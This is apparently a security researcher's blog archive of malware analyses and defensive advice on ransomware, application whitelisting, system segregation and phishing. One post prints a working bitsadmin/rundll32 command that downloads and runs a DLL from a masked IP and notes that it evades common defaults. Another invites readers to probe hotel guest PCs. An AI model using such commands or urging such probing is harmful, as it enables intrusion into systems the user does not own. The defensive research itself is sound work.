bitnuts.de logo

(According to Marcus Ranum in Technology Review): It is most likely that we will breakdown by a fatal system failure caused by connecting one critical system with a not so critical system that was connected to the internet just because someone wanted to check his facebook account through that system and accidentally got hit by a drive-by.

Home Archives Exploitbuster Contact About

Analysis of recent crimware/malware

2016/08/20 by Flo

I have been analyzing recent crimware/malware samples for the last couple of weeks now, and would like to share some interesting bits I stumbled upon. In a nutshell the crimware scene is getting professional and their malware makes use of the latest tricks to camouflage their actions tricky.

One reason for this might be that there are several groups selling crimware as a professional service, also known as malware as a service, where customers can buy a malware package including updates, fancy dashboards to analyze the campaigns infection rate and outcome, lists of e-mail addresses to send e-mails containing the malicious attachments or URLs to hijacked web pages where exploit-kits where hosted etc. While the hijacked web servers and exploit-kits and hacked CMS like Joomla, WordPress among others are commonly known, the malware in fact is getting more interesting, as the criminals update of the provided and distributed malware several times a day. So they are heavily aware of the AV industry and always try to stay under the radar of the engines.

As we know in general it is no rocket science to change the binary footprint of an executable by just rearranging and packing an exe several times, there is more to do to fool and bypass the behavioral engines of modern AV products. It seems that crimeware crews are compiling their malware several times a day, they change the icons, the executables general descriptions and also huge parts of the binary itself by modifying most of the code. We have seen such modifications in MS Office macros for years now where the attacker’s code was just around 1-2% of the whole macro’s code, the rest of it were copy & pasted macros one can find on web pages and in books about macro programming. It seems that malware - especially ransomware authors - use the same trick. I have found several ransomware samples from different crews that seem to use public domain Visual Basic programs to hide their ransomware code. This public domain code is just there to trick the AV’s heuristic scanners and to make the code look like sweet Dorothy who cannot do harm to anybody.

But this is not the whole story. I analyzed how modern ransomware commonly infects Windows PCs these days and was really astonished about the expenditure. There is ransomware which makes use of classic auto start to start a .bat file which in turn starts an Windows’ built in jscript interpreter which again reads and executes a jscript, but from registry. This jscript then starts up a powershell and sends keystrokes to this powershell which in turn does an in-memory code injection into regsvr.exe started up beforehand. Beside that they also make use of a PHP script interpreting DLL.

It is a lot of work just for running the persistent part of simple ransomware, where the encryption algorithm of this crimeware was implemented weakly and could be revealed by a simple known plaintext attack on the crypto. So I asked myself: If someone has the skills for letting his crimware survive a reboot using such sophisticated techniques and then dramatically fails when it comes to cryptography, something must be wrong. Most modern programming languages come with very powerful cryptographic libraries, so one must not have a degree in math to implement crypto. So what is wrong here?!

Well, I have also done some investigation in forums, pastebin, youtube etc. and came to the conclusion that the authors might not be that clever they make us believe they are. From what I have seen it looks like that there is a huge amount of copy and paste in this scene. There are a lot of copy cats just re-using code, which is - for the infection part and stuff to get persistent - not of bad quality. These guys know how to camouflage their doings, also how to keep silent, to change the binary to get rid of AV heuristic alert and so on. They also seem to know how to find vulnerable web pages using outdated CMS (well, it is quite simple: write a stupid python web crawler and simply analyze what a web server and the returned content tells you about the used system). However, it seems that there is lack of knowledge about cryptography and this lack also drawn towards the sample codes shared and used by the criminals. So they make use of simple XOR encryption, they use RSA with weak key lengths or by using wrong parameters making it relatively to crack down the encryption.

But there is also very professional crimware which also makes use of quite tricky infection and persistent techniques , but the guys behind also seem to know a lot about cryptography. I have seen samples which make use of EC and RSA Cryptography using the recommended parameters and key lengths. Additionally, they did not make the foolish failure to write their own crypto code, they make use of well known open source libraries and seem to use them properly, so I think there is little you can do, if such a beast has taken your digital jewels.

If such code finds its way to (semi) public crimware forums we might have a problem in the near future. Especially if the code is the base for sold crimware as a service. Once a good fundamental is set, such crews can elevate their malware engines, get better and better and it is getting harder to defeat them. From my experience I can tell that a brand new malware sample takes up between 12 - 24 hours until it is getting catched by the ordinary AV. A lot of time for malware to spread and guzzle down your system.

At the end it is not that worse as it might sound. Just


IT-Segregation For More Security

2016/04/19 by Flo

In the last couple of months a massive rise of ransomware (aka cryptolockers) can be registered. Reading news papers and dedicated IT press releases in Germany suggests, that this kind of malware spreads across Europe and other western countries. It seems that cyber crooks make easy and a lot of money by blackmailing users, so they switched from “classical” banking Trojans to ransomware. I had some discussions with readers of my private blog, with customers and also with friends about malware trends, and I decided to feature this blog post, sharing my thoughts.

We are living in a highly connected world, in daily business things must be done quick, so often there is not much time to act wisely, carefully and with strict IT Security in mind. But that is a mortal sin in IT Sec, and often the cause for malware infections. What to do?! Well, if you analyze common attacks and attack vectors you will encounter that most of them are executed through exploits by infecting victims using an exploit (kit) for a browser or a browser’s plug-in like Adobe Flash, PDF or Java, or by social engineering tricks, so users do something “odd”, like opening an executable attached to an e-mail, claiming to be an invoice, payment reminder, lasciviously image or video... You know these zip archives containing something like “urgent_invoice.pdf.scr”, “horny.zip.exe”, “important.doc.js” etc.

Unfortunately the main target for such attacks are users of the Microsoft Windows operating system family. Users of Mac OS X or Linux can just be happy, because cyber crooks do not give the hassle, developing malware for such platforms, because the market share and final outcome of a campaign is not worth. Developing and starting a malware campaign for computers running Mac OS X and Linux would more likely not pay off at the end. That is, why you will often read that using a Mac or Linux PC would result in safer browsing and not having any (malware) problems. Well, yes that is somehow right, but not the whole story. Working with Mac and Linux PCs for a long time you will also encounter problems and issues, and you will also see malware that targets such systems. But the probability getting hit is less likely. So using a Mac or Linux-based PC makes computing saver in some fashion.

How could we profit from that? Well, if you have enough money you could buy yourself a Mac and use this PC as your one and only workhorse, or you just remove Windows from your PC and install Linux. It sounds easy, but it is not and Windows users know, that there are reasons to use just Windows. Not only because of Microsoft Office, also because a lot of companies run dedicated applications that are only available for the Microsoft Windows platform. Just switching to Mac OS X or Linux is not the road to go then. Also for private users. There are a lot of peripherals like printers, cameras, home automation etc. that cannot just be run with Mac OS X or Linux, and most people are not IT professionals, they do not have time and passion to learn how to use and hack with Mac OS X and Linux just to get their beloved camera, TV Dongle, Midi-Synthesizer working. They just want to use the PC as is, without having a degree in CS. But they still want and should be safe somehow. What an irony!

So recall the most common ways computers are getting infected: Surfing the web and getting hit by an exploit or through tricking an user to open up a malicious file (attachment, download). Looking how security sensitive companies accomplish securing their users you will often see that they separate networks, more precisely they limit access to digital content from external parties like the Internet or from USB-Drives etc. One way to achieve this is to have two physical machines or a proxy that divides the internal infrastructure from the external. Each and every (insecure) external stuff must pass through a dedicated machine for external stuff, that only processes external data and information. Here the user is not able to process such information with the main information technology. It is split off, hence an attacker can only attack that kind of proxy and not the main IT. The problem is, that such an approach is not very comfortable, nor handy. We all need to answer e-mails, surf the web and should access information quickly.

To make such a scenario more comfy, virtualization comes into play. A virtual machine enables you to run different operating systems in parallel. Switching between one and another virtual machine is just a matter of one or two clicks. You can build up one virtual machine running your primary Windows system and another secondary system, running a Linux for browsing the Web and opening files from external sources. You could also run such sessions on a remote server and just have a remote (VNC/Remote-Desktop) connection to them, also called Remote-Controlled Browsers System. This is what big companies often do, they provide remote (e.g. Citrix) sessions for browsing and opening document files. Thus an user does not open potentially dangerous (external) content on his/her computer, instead such content is opened on a remote or virtual system.

However, the key point is, that the primary system does not open potentially dangerous content from the Internet, external drives etc., thus the system where you process personal, and critical information does not directly getting in contact with dangerous content, hence the risk of malware infecting your beloved digital gems (personal documents, photos, music, etc.) is dramatically lowered. If the second system gets hit by malware, only this system gets infected. Because such so called surf stations or remote desktops are usually getting wiped (reset) cyclically, and are also hardened, it is difficult for attackers to gain full and persistent access to such systems and to move over form such a system to the whole network, infrastructure, or the primary system. Well, it is still possible - do not get me wrong, but it harder to achieve.

A reasonable low-cost solution of such an approach is to install some kind of virtualization host like VirtualBox or VMWare-Player and then to create a virtual machine for a Linux-based Segregation System. I use the term Segregation here, because this system should act as a sluice or floodgate, you shall open potentially insecure content like web pages, e-mail correspondence and untrusted document files on that segregated system. You should carefully check the content and only transfer (copy) such content to your primary machine that is really needed, so content goes through a sluice. Ensure that you always keep the Segregation-System updated, you should still Anti-Virus scan the content and harden it. A simple approach to harden is, by discarding any changes of the VM after shutting the VM down. Virtualization hosts often support snap-shot functionality, it is like freezing the operating system into a defined state, so this state is kept regardless what you do with the dedicated VM. If you crash it, delete files or infect the system with malware, it will always go back to the snap-shot you have taken before. This is a smooth way to keep such a system's integrity, regardless what you do.

If you do not like virtualization what else could be done for SOHO?! Well, a more or less inexpensive solution is to turn a Raspberry Pi into a Segregation System. The new Raspberry Pi v3 should have enough power for surfing the Web, opening up PDF, ZIPs and typical document files. There are plenty of tutorials in the web (and also on raspberrypi.org) on how to configure a Raspberry Pi for basic computing, also on how to basically access the Pi remotely via SSH, and especially with VNC or Remote-Desktop. So you can more or less seamless integrate it into your workflow and use it to surf the web and open up untrusted documents. It is also a great way to clean third party document files: Just open up PDFs or document files with a Linux tool, then convert them to plain data which often removes malicious habit from a file. So you can use it more securely on your primary system.

I personally like the Raspberry Pi and use it as Segregation System, also for spanning a VPN over insecure (open, foreign) WiFi-connections. It is not too expensive, does not require much supply power and works great for private and small office usage. If you do not like VNC/Remote-Desktop you can also use a KVM-Switch. A KVM switch (with KVM being an abbreviation for “keyboard, video and mouse”) is a hardware device that usually allows you to control multiple computers from one keyboard, mouse and display. So you can switch between your primary PC and the Raspberry Pi by just using the same external periphery devices.

Using several (virtual) computers for daily computing operations might sound odd, but is is common practice in professional environments. I have seen it in governmental/military environments, also consulting, financial, and law companies, that dealt with confidential and clasified, valuable, or risky data/information.

Unfortunately it is not widespread and is not done in many companies, if you carefully read and analyze recent IT breaches. The same is true for Application Whitelisting, if you talk to people they all know about it, but there are only a few using it, although it provides so much more security.

I highly encourage you to check this option, also for private usage! Of course it is awkward and users have to readapt, but it is worth the time and money you spend, because getting hacked with all its consequences costs by far more than just deploying and using a dedicated Segregation System. And do not forget about backups, Anti-EXE/Appication Whitelisting, Anti-Exploit-Solutions for your primary computing system as well.


A very fast cryptolocker

2016/03/26 by Flo

I've just stumbled upon a new cryptolocker that encrypts your data extremely fast by just scanning your local drives (c: - z:) and only encrypting the very first 2KBs of typical document files. This makes this malware very efficient. The cryptolocker serves as a typical doc.js file which - when opened - downloads some executables and starts them. The JScript file also writes a .cmd file and a ransom (how to) decrypt.txt file into the %temp% folder. The batch script simply walks through all your local drives (c: - z:) and passes any interesting document file to the downloaded executable, which in turn encrypts only the first 2KBs of the file. In fact not all of your data is then encrypted, but in most cases enough information is bricked that it cannot be used by the document file’s dedicated application. The cyber crooks also add some registry keys to survive the next reboot and to show the ransom message telling you how to pay and getting your files back. My quick analysis showed that the malware excutables are served through hacked Joomla! CMS web pages. Well, as always, a lot of people think they need a CMS but never keep such systems up to date. Unfortunately such CMS pages often get hijacked and end up as malware distribution sites.

I did a quick run on a test machine with my analysis drivers on, you can download the raw log files ransomAnalysis.zip here. If you have any questions, please feel free and contact me. Also do not miss the following video where I show how to reveal this kind of .js based malware. Enjoy and Happy Easter Holidays!


Even cyber crooks are boldly

2016/02/11 by Flo

Currently I am very busy in analyzing and testing ransomware with my brand new kernel driver Pumpernickel, this kernel mode driver enables you to sandbox (limit) write attempts of other processes to certain location which can help to analyze malware or to protect against such scrap. For example you can restrict notepad.exe such that it can only write text files to some whitelisted paths.

While Pumpernickel is hile doing yet another run I stumbled acorss this one:
%temp% loacation of a cryptolocker
Well, this is definitly the height of impudence. This cryptolocker delivers as an RAR-SFX executable and extracts itself into a folder named Cryptolocker. This is really weird and of course bold. My conclusion: these guys feel so save that they do not care much about hiding. First delivering such malware in form of a pure executable (no zip or exploit), second internally naming it cryptolocker tells stories about the whole industry here. Nothing more to say. Take care!


Bypassing application whitelisting with regsvr32.exe

2016/01/09 by Flo

While analyzing some Cryptolocker (ransomware) during my Christmas Holidays I stumbled around some cryptolockers that used regsvr32.exe to bypass application whitelisting solutions. I started experimenting and can confirm that you can easily misuse regsvr32.exe to load and execute dynamic link libraries. Well, if you have set up your whitelist properly (= also block DLLs, OCXs, SYS etc.) your system is not in danger, especially if you block any executable loading from user folders. But we all know that most anti-exe solutions on the market lack DLL and OCX-blocking in their default configuration - same on GPOs-, so you shall be aware and cross-check.

If you cannot blacklist all of your user folders and especially DLLs in such folders, you shall at least blacklist regsvr32.exe. But there are also a lot of cryptolockers out there that misuse other Windows' preinstalled tools like wscript.exe (and other like .NET compilers), so I also heavily recommend that you blacklist scripting hosts, and generic Windows admin tool executables, too (see my post from 2015/12/07). Personally I do not need most of such tools for daily operations on my PC - and I bet that most ordinary users also do not make use of them daily. So, for your own security block and blacklist as many as you can, to avoid these ransom- and cryptolocker attacks that seem to spread like all year's winter flu in the last couple of months (but it also helps to mitigate against other threats like most browser exploit's exe droppers etc).

By the way, check out Excubit's Beta Camp, especially my new Project called Pumpernickel. This driver enables you not just to track down what an executable willl save on your disk, this pure Kernel Mode Driver is also able to block such attempts. Everything will be logged, so you can easily use it for forensics...


Limits of Application Whitelisting

2015/12/07 by Flo

If you are peeking through the scene you may have noticed that Application Whitelisting is currently under fire and security researchers found quite impressive ways to overcome the classic whitelisting approach - whether be it policy based or hash based. Information Security Analyst Casey Smith and SecConsult made a great job analyzing and bypassing whitelisting approaches in the last couple of months and weeks, so I heavily suggest that you check out their stuff.

In a nutshell, most solutions fail in several aspects like: forgetting about interpreter and scripting languages, incomplete or bad user manuals that lead to wrong configuration, bad code quality that lead to exploit or bypass the whitelisting solutions, windows paths that are whitelisted and could be write accessed by attackers, etc. Especially interpreter and scripting languages are a very interesting way to attack an application whitelisting protected machine and often succeed if you one did not configure the whitelist tightly.

We as security guys and hackers know that nothing is absolutely bullet proof, IT security is always a battle of the fittest and often looks like playing cat and mouse. Well, thus your IT security mitigation and defense strategies should always be layered. You should always have different protection strategies in place to jump in, where one dedicated solution may fail. Never stop always rethink your mitigation techniques, keep up to date and check out what the bad black- and white hats are doing.

It hopefully was well known that classic whitelisting will fail when attackers can use (bytecode-) interpreters or reflective in-memory attacks to start malicious code. To avoid such attacks you should do more than just checking the executable intended to run. For example you can check who is calling what - I call this parent checking and implemented it into Tuersteher as well. So you are able to blacklist the browser such, that it cannot start a cmd.exe shell, or any scripting host. I have also implemented several kernel drivers that are able to check on the command line options an executable is going to be started (see command line scanner at Excubits). For example my driver can detect, that the browser wants to start cmd.exe with the /c flag, or that powershell.exe was called with a script from C:\Users\Florian\AppData\Local\Temp\evil.ps. For example you can whitelist powershell just for some well known (and really needed) command line parameters, and only from source files you know and trust. So an attacker is not able to start these security critical executables with command line options pointing malicious options and references (like malign scripts). I also use a memory protection driver that controls what process has access to the memory of another process. This helps to reduce the attack surface by exploits and other malicious executables that try to inject their code into another legit running application like explorer.exe, svchost.exe, etc.

Well, I know, this will not block all attacks, it is a way to mitigate and makes an successful attack more complicated. There are still gaps like exploits that directly (reflective) load their malware (DLL) into the own exploited application's process. Personally I think that we will encounter more and more in-memory attacks in the near future as anti exploit techniques and protections tools will be armed against the malign stuff we currently see.

I just do not want to blame on whitelisting because I still think it is a great way to mitigate against a whole bunch of basic attacks. If you are down with malware analysis you will confirm that most (~80-90%) of the attacks we see could be blocked by even simple application whitelisting, so you shall implement it. But you should also know the limits and see it as one mitigation out of a bunch of mitigations you need. It is not enough to install application whitelisting and you are done! There is more to do and more to review on a regular basis. IT Security is a moving process, it will never be enough to just install that super cool anti malware and exploit application, you should always keep track on what is going on in the scene and adapt regarding new developments.

For example for now, do a quick start to enhance your current whitelisting configuration following the recommendations here:

Also blacklist the following applications (executables) if you do not need them:

I also suggest that you restrict write access permissions on

such, that you - as a default/normal user - cannot copy (or write) files into one of these folders. Please note, ensure that Windows Update (or the Trusted Installer and Admin) are still able to write into these folders or you gonna end up in some trouble.

If you have any questions or want to discuss. Well, I am open minded and happy to hear from you.


A story about Hotel Business Center PCs

2015/10/30 by Flo

Having a lot of business trips in the last couple of months I also spent some time at hotel lobbies, waiting for colleagues, to check in and out, waiting for the transfer bus or taxi etc. In modern hotels you can enjoy fast WiFi but most hotels also feature guest PCs or a business center where you can use PCs to surf the web, write letters with Word, print PDFs, do some copying etc.

Anyway, being and waiting in hotels is boring, so I stared to check out these hotel lobby and business center PCs I have often encountered, but always ingoned - until now! So, what happened? Well, I lurked around and watched people to see how they use such computers. To my amazement there were a lot of people doing private things on such machines, like opening their web-mail accounts, facebook, twitter, amazon and online-banking, etc. Some opened up their car rental vouchers and flight tickets for printing or rebook etc. So there is a lot of personal information processed on such machines, and a lot of user names and passwords used.

Thus I started to do some basic security checks on these PCs, checking the browser's cache, auto-fill features, etc. It turned out, that these PCs are all running Microsoft Windows (7, or 8.1), Chrome, WinZIP, Adobe Acrobat Reader and Microsoft Office. Most of them are not patched regarding the latest vulnerabilities (I tried ~30 at 10 different hotels across Europe in Germany, Spain, Corsica, Poland, Great Britain). All machines had an Anti Virus in place. There was no additional protection against starting applications or dynamic link libraries. Some had decent SRPs installed, but I was always able managing to injected executables through sticky shell commands or to open file dialogs, etc. Amazingly most systems were protected by some kind of file system virtualization, so after a reboot any unintended software installation or manipulation of the file system was gone. Nice to know, but these systems were only rebooted manually by the hotel staff once a day (around midnight). So if some hotel guest got hit by a drive-by (or if he or she installed malware) early at morning, malware could have enspionaged all subsequent users during the rest of the day.

Ouch!

Well, we security enthusiasts all know that you shall never ever use such machines. But I've kind of hoping that these hotels (and some of them have big names in the scene) are a bit more aware, and shall try to protect theirs hotel lobby or business center PCs better than this. Not just because of protecting their guests, but also because these machines have access to the hotel's network in some fashion. I could think of further attacks starting through attacking such a PC and then go hanky-panky until you reach the hotel’s core IT system (there you have access to debit and credit card information, about guests, etc.). I would have expected that these machines at least be protected by very strict SRPs and that the user is not able to install (start) any application. Especially the latter is very dangerous because it leads that an attacker is able to run his own executable code on such machines, which gives him more power and possibilities!

Well, I did not have the time to do more research on these PCs, but I think this could be very interesting and worth to have an eye on. Just to make one thing clear: I did not install any malware nor anything bad, I just tried to find ways to start applications and libraries - I highly recommend that you also do not to try, because it is illegal! Anyway, this could be an very interesting research project, so next time you are waiting and hanging in your hotel’s lobby, give it a try. Send me an e-mail about your experiences, I am happy to hear about your findings and ideas.


FBI's strange advice on crypto lockers

2015/10/29 by Flo

At Boston's Cyber Security Summit the FBI notes that current Crypto Locker Malware is that good that there is litte you can do against and to recover your encrypted files. They said, "to be honest, we often advise people just to pay the ransom". More details can be read at securityledger.com. Well, what to say? It sounds like capitulation and demonstrates the impotence against the cyber crime underground. If you are in IT-security business this is - of course - no breaking news. The organized crime is very good in adapting to new fields for their income and they are getting very professional. It is not like back in the 1990's where just some teenage guys hacked for fun, nowadays we see highly sophsiticated malware written by experts that want to make big money. So no more hacking for fun, it's hacking for profit and the organized crim is already here. I have heard of organized crim gangs that now make more money with cybercrime than with drugs and in the red light district - that should make us think.


Lock Me Down Scotty - A quick analysis of a batch based Cryptolocker

2015/07/23 by Flo

Cryptolockers are no big news these days as they are very common and discussed on security Blogs, conferences and by law enforcement. Well, we were able to catch a new family that is currently not very common in the "scene", so this is why I feature a blog post on a very special cryptolocker that I have observed and analyzed during the last days.

cryptolocker splash screen In a short sum up this piece of malware is not written in C, nor is it a Powershell Script or VBS. It was crafted very simple and tight as a well crafted collection of open source and Windows’ build in console tools; combined wickedly nasty in a more or less simple command line batch script. So what your malware scanner sees is, a bunch of well known command line applications and simple (but obfuscated) batch scripts. In general not very suspicious if you have a quick look on them.

The cryptolocker itself was served as a single exe file that turned out to be a SFX (self extracting executable) WinRAR archive. We catched the file claiming to be some Hollywood Blockbuster movie streaming file with the extension ".Streaming.mpg.exe". The SFX was compiled with the latest version of WinRAR (US version), used a custom, but well designed icon file for curiosity reasons I assume. The SFX silently extracts the archive into the %temp% folder and starts up a batch script afterwards. The stage 1 batch script starts a primitive .vbs file that runs another batch script in a hidden cmd.exe console. I assume that this steps are performed just to avoid getting discovered by the ordinary user. The script also pauses several times and performs some bogus operations on the hidden cmd.exe shell to trick heuristic scanners, and, to fool analysis environments that do not spend too much time on given samples. It also calls Sysinternal's sdelete to clean up the user's folders' free space just to spend some more time doing nothing suspicious at the beginning. The tool sdelete will become a "key feature" later, so keep it in mind.

At the end you will be prompted with a fake error message claiming that a required "streaming codec" is missing. Thus, no FREE "Hollywood Blockbuster" streamed. Well, as I often recommend to friends and customers: Keep your ass away from these sharing sites. License music, pay for watching movies, and buy original software. Anyway, lets move on.

If you see this message it is almost too late. The stage 2 batch script has already called openssl to generate a 2048-bits RSA .x509 certificate. The certificate's subject is interesting:

/C=US/ST=Ransom/L=Ransomfield/O=XXX/CN=www.ransom.ware

After generating the certificate the batch script has opened up TOR and submitted the private key to a hidden service into the TOR network (.onion addresses are hard coded into the batch file) by using wget to post the data as a base64 data stream. Again, encoding was done entirely using openssl. Establishing a connection to the TOR network usually takes some time, so this seems to be a clever idea to bump out heuristic and analysis tools, that will not wait for too long. By the way, the user-agent specified for wget can be used to easily identify this kind of threat, because of its odd version of Google Chrome (42.0.1337.007):

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.1337.007 Safari/537.36"

If the hidden service has received the private key it returns a strange reply message "lockMeDownScotty" telling the batch script to continue, and to encrypt all personal files (amongst others these are .jpg, .doc, .xls, .pdf, .txt, .mp3, .raw, ...) on the user’s hard disk, especially in the user’s profile folders. Encrypted files will have the very fitting extension .cryptoLocked, well together with the "lockMeDownScotty", the user-agent and .x509 certificate it seems that these guys shall also think about a career as clowns ☺.

To encrypt the files, the cryptolocker simply uses openssl and securely deletes the original unencrypted files using Sysinternal's sdelete. The secret key and other temp files created by the cryptolocker are all securely deleted using sdelete. So there is little chance to recover any of these afterwards. I tried on my forensics machines but never got a hit. The malware also tries to delete system backups and well known backup files (e.g. .bak, .old, .img, etc. files). If you are not running your system with admin rights all the time, there is a good chance that the attempt to delete the system backups will fail and you are able to recover.

The cryptolocker also tries to get persistent in the registry (using reg.exe) to ensure it is executed every time the user boots up and logs in (typical HKCU\Software\Microsoft\Windows\CurrentVersion\Run\). Although everything is performed in a pure batch file, the malware is clever enough to only generate a single 2048-bit key per user. It also contains a loop that tries to encrypt newly written files once in 30 minutes. After each round of encryption, the user gets prompted with a typical ransom message provided in form of a simple jpg file (see screenshot above) started with the default image viewer and a text (.txt) file opened with Notepad. Nothing special here, it is presented in the same fashion as we all know from other ransom- and cryptolockers. What you see are well known instructions on what to do and how much to pay. One remarkable thing is, that if you pay using bitcoins you only have to pay 0.5 bitcoins whereas if you decide to pay "cash" by using gift cards, it is fairly more: $500.

It is also very interesting that the crooks use TOR to its extends. Not only that they upload the private key using TOR, they also only provide a link to an .onion address to get in touch with them. Most ransomware I have seen so far at least provide an ordinary web link that can be accessed without using TOR and that is hosted by one of the well known bullet-proof hosters or a #pwned server or site.

It seems that their hidden service is not available all the time, I have tried it several times and it was online only a few hours a day. I suppose that it is operated from a private online connection or it moves from one infected machine to another. Currently we are also not sure if this was and is some kind of test balloon, and the crooks prepare a larger attack. The hash of the initial executable is unknown to recent online malware analysis systems. We keep on track and will follow up, if there are any news.

Instead of using WinRAR I assume that other packers can and are used, so you should watch out for packed executables containing at least these files

with some additional .cmd/.bat files and two or three tiny (2-4 lines of code) .vbs scripts. Since the SFX's hash value can be changed easily it does not make sense to provide it here. We also assume that the scripts may change, so what you shall look for is, the combination of the listed executables above and some scripts in the same package.

Well, since you have to start an initial executable we think the most obvious action to avoid this threat is: Do not start unknown executables, avoid getting tricked by e-mail attachments claiming to be an invoice pdf, tracking code, legal warning etc. Again, do not try to get things for free that normally cost money. From the Exploitbutser framework we have observed that most executables submitted are serial number generators, cracking tools, and alleged full versions of commercial software. So do not wonder if you are getting hit, if you download and execute the latter mentioned illegal stuff.

Personally I think that this is not the end of the story, and we will see more malware in the same fashion coming up soon. Using command line tools in combination with simple scripting is not new, but in this special case somehow a clever idea to get evil things done without implementing stuff from scratch. I think that not so skilled "would be" hackers seem to be able to build quite potent malware without in depth knowledge and coding skills. For example securing communication and using (hidden) servers in the TOR network, using openssl as a strong crypto library looks like that some of them are going this way. Even if such crooks do not understand what they do, building their malware upon such tools and libraries makes this scrap more resistant and secure - unfortunately.

But well, let us wait and see if this was just a may fly.

As always, if you have any questions, comments or suggestions, do not hesitate and contact me.


DHL-Tracking Malware Spam

2015/06/08 by Flo

My spam honeypots got some new DHL tracking spam. DHL is a German national and international parcel shipping service. They also offer professional and global express services as well as customized logistics solutions. Shipments can be tracked through their web page. DHL never sends PDFs containg information about a shipment like in the screenshot on the right hand side. If you would like to see your shipment's state go to DHL's official site and enter the shipment ID and other information like the ZIP code etc.

During the last couple of months cyber crooks used faked DHL tracking PDFs containing a link to the current tracking state of a shipment which allegedly was on the way. Inexperienced users may follow these links and thus download a ZIP file that contains a file in the format DHL_Sendungsverfolgung_2015.pdf.exe. It is yet another trojan that will be installed if an user gets fooled and clicks on the "pdf" that is just an evil exe.

Well, this is nothing new. We see lots of faked invoice and tracking attachments that persuade a user to click on a link, open a ZIP file etc. So what is the deal? Well, the "deal" is that most of the attached executables are truly unknown to all recently updated AVs you might have installed. Even if you are a user that keeps the system and protection software updated you are still in danger. One wrong or too fast click and your system is owned by malware. During the last few weeks we tested the detection rate: It took most AVs up to 24 hours until they were able to detect a single fake pdf.exe that was distributed through a PDF or e-mail link. Well, 24 hours is a long time - enough time to infect hundreds of PCs.

But there is more to say. Cyber criminals are getting smarter. If you are an informed user and check for the linked domain manually, you get forwarded to the official site. Only the full URL will download the trojan ZIP. If you dig deeper there is more to see. The example PDF from above links to: hxxp://nolp.sendungsverfolgung-dhl.com/sendung/pdf/DHL_Sendungsverfolgung_00340433836703994176.pdf.xxx

If you do a whois on nolp.sendungsverfolgung-dhl.com you see:

If you do a whois on sendungsverfolgung-dhl.com you see:


Well, these smart little crooks are getting tricky. So you better look twice and by the way: Do not trust your AV on new files that seem to be clean. Put them into quarantaine for at least 24 hours until you open them ;-)

There are still some people around me constanly asking: Why shall we use anti-exe or application whitelisting? And why do we not use Windows build in anti-exe features?! Well, this blog post should give you a hint why you MUST use anti-exe these days. And why you cannot use build in technology? Well, there is nothing you can instanly use right out of the box without hassle.


Research on bitsadmin.exe: Microsoft’s built in Malware Dropper?

2015/05/21 by Flo

At this year's RSA-Conference, Marcus Murray has shown how hackers can gain access to a Windows-Server through a combination of weak upload sanity checks and missing execution prevention on the Server. In his detailed presentation he showed how to create a cmd shell on a server that pipes I/O to the hacker’s browser (a.k.a. Browser Shell). The next problem to solve was to upload and execute code using this cmd shell (what he needed was a malware dropper).

He has managed to compile C# code (featuring a simple EXE Dropper) through the cmd shell and was able to execute this executable. It then downloaded and executed a metasploit generated sort of trojan executable from the web. At the end he fully controlled the Windows-Server and was able to dig deep into the network. It was a really cool show case on different techniques hackers combine to attack targets nowadays.

I really liked Murray’s idea of building an on the fly dropper using C# code, then building an executable out of it and starting this executable on the attacked site to download the intended malware. Until now I thought this is one of the smartest ways to get foreign executables downloaded and started, if you do not want to use an in-memory exploit by using all the well known dropping and executing stuff in win32-API. Well, I was wrong.

While analyzing some malware I stumbled over a really clever way to achieve the same thing Murray was doing, but with less steps to perform. Microsoft ships a tool called bitsadmin.exe. With this tool you can download arbitrary files from the Internet. Thus you can also download an executable and then execute it. Well, you could do something like

cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0

This simple line downloads a DLL and starts it with rundll32.exe. Instead of a DLL you could also use an EXE, but I prefer DLLs because they are most likely not blocked by many execution prevention systems on the market in their default configuration. So there is a good chance to pass by, without getting trouble.

Besides the fact that you are able to directly download any file you like, this has also enormous impact for zero days. Analyzing many of them I often see sophisticated exploit code trying to obtain library calling addresses of URLDownloadToFile, WSARecv, recv, recvfrom, InternetReadFileExA, CreateProcess, ShellExecute, LoadLibrary, CreateFile, etc. just to download and run an executable. Well, using this technology attackers will save a damn bunch of such API calls. All they need to do is to call shellexec with the line above. This is awesomely smart.

To finish this blog post: Guys beware, this is not a PoC or just a nice idea. I have seen it in the wild, it is already used by attackers. So beware and watch out for bitsadmin.exe. I would highly recommend to delete or blacklist this executable on your Servers (SOHO Windows, too) if you do not make use of it. By the way, you should additionally blacklist *script.exe, *vbc.exe, *jsc.exe, *ilasm.exe, *csc.exe, *build*, *powershell.exe, *hh.exe, *msiexec.exe. Well, I know sometimes you need one of these executables, but to be honest: In most scenarios you do not. And for everyday word and excel business you again do not need these executables. Protect your system, use black-/whitelisting or SRPs. For more details on what you achieve in level of protection see four simple strategies to mitigate 85% of threats.

If you have any questions do not hesitate and contact me. If you have more dangerous executables to block, other smart ideas to build a Dropper without using win32-APIs let me know. I am always happy to hear from you and appreciate any feedback. Take care!


A kernel based Registry Scanner

2015/04/04 by Flo

It has been a little while since I have posted on forensics drivers. Well, I will now make up the thing and decided to publish my true kernel based Registry scanner. It is yet another filter driver that can help you analyzing malware and its behaviour. The driver fully runs in kernel mode and does not requiry any tool in user mode to work. Back in the days I did registry logging using SSDT and other hooking mechanisms. It worked very well, but it was far away from being a sound and gentle solution. With the RegistryScanner driver things are more streamlined and due to the fact that everything is in the kernel now, it is more difficult for an attacker to pass by.

The driver logs attempts (query, create, rename, delete, replace) to a log file (c:\windows\registryscanner.log). You can simply install the driver through the RegistryScanner.inf. Start it from the console via "net start RegistryScanner" and stop it via "net stop RegistryScanner".

Please note: You shall sign the driver in order to load it into the kernel for both architectures, meaning 32-bit and 64-bit. But you can also disable signature checking on boot up. Just start Windows with enhanced boot option and select the appropriate boot option.

